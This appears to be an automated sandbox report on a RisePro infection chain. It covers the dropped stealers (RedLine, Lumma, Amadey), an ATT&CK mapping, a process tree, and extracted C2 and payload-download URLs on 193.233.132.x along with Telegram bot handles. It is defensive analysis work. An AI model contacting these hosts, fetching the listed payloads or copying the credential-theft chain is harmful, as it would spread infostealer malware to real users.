Source: Yara match | File source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 2531414c80.exe PID: 8848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RageMP131.exe PID: 11696, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00151204 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00151806 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
Note on these two routines: the first creates a socket, binds it and puts it into the listening state (a local server port, not an outbound connection); the second only creates and binds. Both match the shape of the AutoIt runtime's TCPListen (socket/bind/listen) and UDPBind (socket/bind) built-ins, and since b3168c3d9b.exe embeds the AutoIt interpreter their presence shows that the capability is linked in, not by itself that the script calls it. A listening port actually being opened would show up as a bind/listen event in the network behaviour, which is the check to make before treating this as confirmed remote-access functionality.
MITRE ATT&CK Matrix (rebuilt from the flattened table: one list per tactic column; a numeric prefix is the report's own counter for a matched technique, reproduced as printed; entries without a prefix are the matrix's unmatched placeholder techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations (none matched)

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server (none matched)

Initial Access: 2 Valid Accounts. Unmatched: Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain

Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 11 Scheduled Task/Job. Unmatched: Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell

Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 11 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder. Unmatched: Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers

Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; 11 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder. Unmatched: Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers

Defense Evasion: 111 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Install Root Certificate; 13 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 2 Valid Accounts; 581 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection; 1 Rundll32 (every listed entry matched)

Credential Access: 2 OS Credential Dumping; 31 Input Capture; 1 Credentials in Registry; 1 Credentials In Files. Unmatched: LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture

Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 249 System Information Discovery; 1081 Security Software Discovery; 581 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery. Unmatched: Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media (none matched)

Collection: 1 Archive Collected Data; 41 Data from Local System; 1 Email Collection; 31 Input Capture; 3 Clipboard Data. Unmatched: GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection

Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 1 Application Layer Protocol. Unmatched: Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB (none matched)

Impact: 1 System Shutdown/Reboot. Unmatched: Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
Behavior Graph ID: 1430545 | Sample: file.exe | Start date: 23/04/2024 | Architecture: WINDOWS | Score: 100

Start node signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 16 other signatures

Process tree reconstructed from the graph's "started" edges (indentation = child of the process above; numbers in parentheses after a process name are the graph's count badges for created registry values / files, see legend):

file.exe (5)
  dropped: C:\Users\user\AppData\Local\...\explorta.exe (PE32)
  signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
  explorta.exe (2, 23)
    network: 193.233.132.139 FREE-NET-ASFREEnetEU Russian Federation; 193.233.132.167 FREE-NET-ASFREEnetEU Russian Federation
    dropped: C:\Users\user\AppData\Local\...\amert.exe (PE32); C:\Users\user\AppData\...\2531414c80.exe (PE32); C:\Users\user\AppData\...\b3168c3d9b.exe (PE32); 4 other malicious files
    signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); 5 other signatures
    2531414c80.exe (6, 61)
      network: 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States; 147.45.47.93 FREE-NET-ASFREEnetEU Russian Federation; 172.67.75.166 CLOUDFLARENETUS United States
      dropped: C:\Users\user\AppData\Local\...\RageMP131.exe (PE32); C:\ProgramData\MPGPH131\MPGPH131.exe (PE32); C:\Users\user\...\cgrqKzIZDKj22M18G57j8co.zip (Zip)
      signatures: Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file / registry access); 6 other signatures
      WerFault.exe
        network: 20.42.65.92 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
        Conhost.exe
      schtasks.exe
        conhost.exe
      schtasks.exe
        conhost.exe
    amert.exe
      dropped: C:\Users\user\AppData\Local\...\chrosha.exe (PE32)
      signatures: Multi AV Scanner detection for dropped file; 3 other signatures
    b3168c3d9b.exe (1)
      signatures: Binary is likely a compiled AutoIt script file; 2 other signatures
      chrome.exe (9)
        network: 192.168.2.4 unknown unknown; 192.168.2.5 unknown unknown; 2 other IPs or domains
        chrome.exe
          network: 142.250.105.147 GOOGLEUS United States; 142.250.105.84 GOOGLEUS United States; 9 other IPs or domains
        chrome.exe
          network: 64.233.176.101 GOOGLEUS United States
        chrome.exe
          network: 64.233.185.102 GOOGLEUS United States
        2 other processes
    explorta.exe
chrosha.exe
  network: 185.172.128.19 NADYMSS-ASRU Russian Federation; 77.221.151.47 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation; 193.233.132.234 FREE-NET-ASFREEnetEU Russian Federation
  dropped: C:\Users\user\AppData\Roaming\...\cred64.dll (PE32+); C:\Users\user\AppData\Roaming\...\clip64.dll (PE32); C:\Users\user\AppData\Local\...\install.exe (PE32); 17 other malicious files
  signatures: Hides threads from debuggers; 2 other signatures
  swiiiii.exe
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    RegAsm.exe
      network: 104.21.67.211 CLOUDFLARENETUS United States
      signatures: Query firmware table information (likely to detect VMs); Installs new ROOT certificates; 2 other signatures
    2 other processes
      network: 52.182.143.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
  rundll32.exe
    rundll32.exe
      signatures: System process connects to network (likely due to code injection or exploit); Tries to steal Instant Messenger accounts or passwords; 3 other signatures
      netsh.exe
        conhost.exe
MPGPH131.exe
  signatures: Antivirus detection for dropped file; Tries to steal Mail credentials (via file / registry access); Machine Learning detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
  WerFault.exe
14 other processes
  network: 23.221.242.90 TISCALI-IT United States; 40.126.28.22 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 2 other IPs or domains
  dropped: SystemMechanic_548...38868BD1.exe (copy) (PE32); C:\Users\user\AppData\Local\...\BIT1659.tmp (PE32); C:\Users\user\...\M5gQOMOo3fGmoJBomt4v2FX.zip (Zip)
  signatures: Multi AV Scanner detection for dropped file; Benign windows process drops PE files; Binary is likely a compiled AutoIt script file; Tries to harvest and steal browser information (history, passwords, etc)
  chrome.exe
    chrome.exe
  chrome.exe
    chrome.exe
  WerFault.exe
  4 other processes

Submitted sample:

Source | Detection | Scanner | Label | Link
file.exe | 47% | ReversingLabs | Win32.Trojan.RisePro
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML

Dropped files:

Source | Detection | Scanner | Label | Link
C:\ProgramData\MPGPH131\MPGPH131.exe | 100% | Avira | HEUR/AGEN.1360556
C:\ProgramData\MPGPH131\MPGPH131.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe | 76% | ReversingLabs | Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exe | 45% | ReversingLabs | Win32.Trojan.RisePro
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe | 51% | ReversingLabs | Win32.Trojan.RisePro
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe | 67% | ReversingLabs | Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll | 92% | ReversingLabs | Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.PureLogStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll | 96% | ReversingLabs | Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe | 21% | ReversingLabs
C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | 45% | ReversingLabs | Win32.Trojan.RisePro
C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.PureLogStealer
C:\Users\user\AppData\Local\Temp\1000149001\gold.exe | 67% | ReversingLabs | Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe | 76% | ReversingLabs | Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\1000152001\jok.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000208001\install.exe | 21% | ReversingLabs
C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | 45% | ReversingLabs | Win32.Trojan.RisePro
C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | 47% | ReversingLabs | Win32.Trojan.RisePro
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp | 12% | ReversingLabs
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy) | 12% | ReversingLabs
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 96% | ReversingLabs | Win32.Trojan.Amadey
C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll | 92% | ReversingLabs | Win64.Trojan.Amadey
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
                                No contacted domains info
Name | Source | Malicious (the Antivirus Detection and Reputation columns did not survive extraction)
http://193.233.132.139/ | explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmp | true
https://duckduckgo.com/chrome_newtab | 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/sev56rkm/index.php12001 | explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com:443/demo/home.php?s=89.187.171.132P | MPGPH131.exe, 00000013.00000002.2500776200.000000000177F000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/f1daa8e86e8e8fda7df3081405eac52aa495c49#b | explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmp | false
https://duckduckgo.com/ac/?q= | 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | false
https://ipinfo.io/FW | RageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/Local | explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmp | false
https://t.tIpo | RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com/ | MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp | false
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000006.00000003.2089816565.000002AF2A990000.00000004.00000800.00020000.00000000.sdmp | false
https://ipinfo.io/widget/demo/89.187.171.132 | 2531414c80.exe, 00000008.00000002.2511321549.000000000150F000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.0000000001529000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000170A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.00000000014AA000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.167/cost/lenin.exetK | 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/ResolveUser.srf | svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/devicechangecredential.srft | svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp | false
https://t.me/risepro_botftW | RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.167/cost/go.exe | 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfr | svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.167/cost/go.exer | MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp | false
https://t.me/RiseProSUPPORTv= | MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf( | svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp | false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds | svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com:443/demo/home.php?s=89.187.171.132 | 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013DC000.00000004.00000020.00020000.00000000.sdmp | false
https://t.me/risepro_botisepro_bot | RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com/demo/home.php?s=89.187.171.132icroso/ | 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp | false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA | svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf | svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmp | false
https://t.me/RiseProSUPPORTqUTv | MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp | false
https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmp | false
https://t.( | 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.167/cost/lenin.exe4 | MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/erences.SourceAumid | explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmp | false
https://download.iolo.net/ | svchost.exe, 00000006.00000002.3344029385.000002AF2AD21000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.167/cost/lenin.exepro_botC | MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp | false
http://Passport.NET/tb_ | svchost.exe, 0000001E.00000002.3329736359.000001EFCECB8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/ws/2005/02/scdn | svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com/demo/home.php?s=89.187.171.132J | 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp | false
https://ipinfo.io/W | MPGPH131.exe, 00000013.00000002.2500776200.00000000016DD000.00000004.00000020.00020000.00000000.sdmp | false
https://db-ip.com/demo/home.php?s=89.187.171.132mp | RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmp | false
https://ipinfo.io/T | MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/sev56rkm/index.phpL | explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmp | false
https://account.live.com/msangcwam | svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355752534.000001EFCE557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp | false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.ex | svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmp | false
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll | 2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmp | false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/sev56rkm/index.phpX | explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmp | false
http://Passport.NET/tbE% | svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp | false
http://crl.ver) | svchost.exe, 00000006.00000002.3326223152.000002AF2AC00000.00000004.00000020.00020000.00000000.sdmp | false
